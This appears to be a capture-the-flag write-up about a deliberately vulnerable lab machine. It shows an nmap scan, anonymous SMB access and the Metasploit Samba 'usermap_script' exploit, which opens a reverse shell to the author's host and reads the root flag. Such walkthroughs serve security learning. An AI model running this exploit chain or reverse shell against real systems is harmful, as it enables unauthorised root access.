This was such an easy machine, its almost not worth completing the write-up for it. But i decided in the end that i would, purely for completeness.
I scanned the machine with NMAP, and was presented with the following details.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
# Nmap 7.70 scan initiated Thu Aug 22 10:10:07 2019 as: nmap -A -p- -oN scan 10.10.10.3
Nmap scan report for 10.10.10.3
Host is up (0.065s latency).
Not shown: 65530 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.3
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: OpenWrt White Russian 0.9 (Linux 2.4.30) (92%), Linux 2.6.23 (92%), Belkin N300 WAP (Linux 2.6.30) (92%), Control4 HC-300 home controller (92%), D-Link DAP-1522 WAP, or Xerox WorkCentre Pro 245 or 6556 printer (92%), Dell Integrated Remote Access Controller (iDRAC5) (92%), Dell Integrated Remote Access Controller (iDRAC6) (92%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (92%), Linux 2.4.21 - 2.4.31 (likely embedded) (92%), Citrix XenServer 5.5 (Linux 2.6.18) (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -2d23h03m38s, deviation: 0s, median: -2d23h03m38s
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| NetBIOS computer name:
| Workgroup: WORKGROUP\x00
|_ System time: 2019-08-19T02:31:04-04:00
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 30.07 ms 10.10.14.1
2 31.77 ms 10.10.10.3
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Aug 22 10:35:22 2019 -- 1 IP address (1 host up) scanned in 1516.09 seconds
From here we can see FTP, SMB, DISTCC and SSH are all running. Anonymous access was allowed on FTP. But there are no files present. I next tried connecting to SMB:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
root@kali://root/websvr# smbclient \\\\10.10.10.3\\tmp -p 445
Enter WORKGROUP\root's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Dec 6 16:56:00 2019
.. DR 0 Sun May 20 20:36:12 2012
orbit-makis DR 0 Fri Dec 6 11:25:31 2019
.ICE-unix DH 0 Fri Dec 6 11:03:09 2019
.X11-unix DH 0 Fri Dec 6 11:03:34 2019
gconfd-makis DR 0 Fri Dec 6 11:25:31 2019
.X0-lock HR 11 Fri Dec 6 11:03:34 2019
5120.jsvc_up R 0 Fri Dec 6 11:04:17 2019
7282168 blocks of size 1024. 5678284 blocks available
You see see from the output we also have anonymous SMB access. However after some browsing around there are no useful files stored within SMB either.
One of the details detected in the NMAP scan was that Samba 3.0.20-Debian was being used. I did a google search for exploits involving this version of SAMBA. I found a Username Map Script exploit which allows command execution by specifying a username containing shell meta characters. This exploit in included in metasploit. So i started msfconsole and ran the exploit:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
msf5 > use exploit/multi/samba/usermap_script
msf5 exploit(multi/samba/usermap_script) > set RHOST 10.10.10.3
RHOST => 10.10.10.3
msf5 exploit(multi/samba/usermap_script) > exploit
[*] Started reverse TCP double handler on 10.10.14.25:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo RXu673TIo0yJNYIz;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "RXu673TIo0yJNYIz\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.25:4444 -> 10.10.10.3:59078) at 2019-12-09 20:05:13 +0000
ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
lost+found
media
mnt
nohup.out
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz
whoami
root
cd root
ls
Desktop
reset_logs.sh
root.txt
vnc.log
cat root.txt
[REDACTED]
From the output you can see the exploit ran successfully. Entering the whoami command showed that i was running as root. From here i was able to browse to /root and cat root.txt.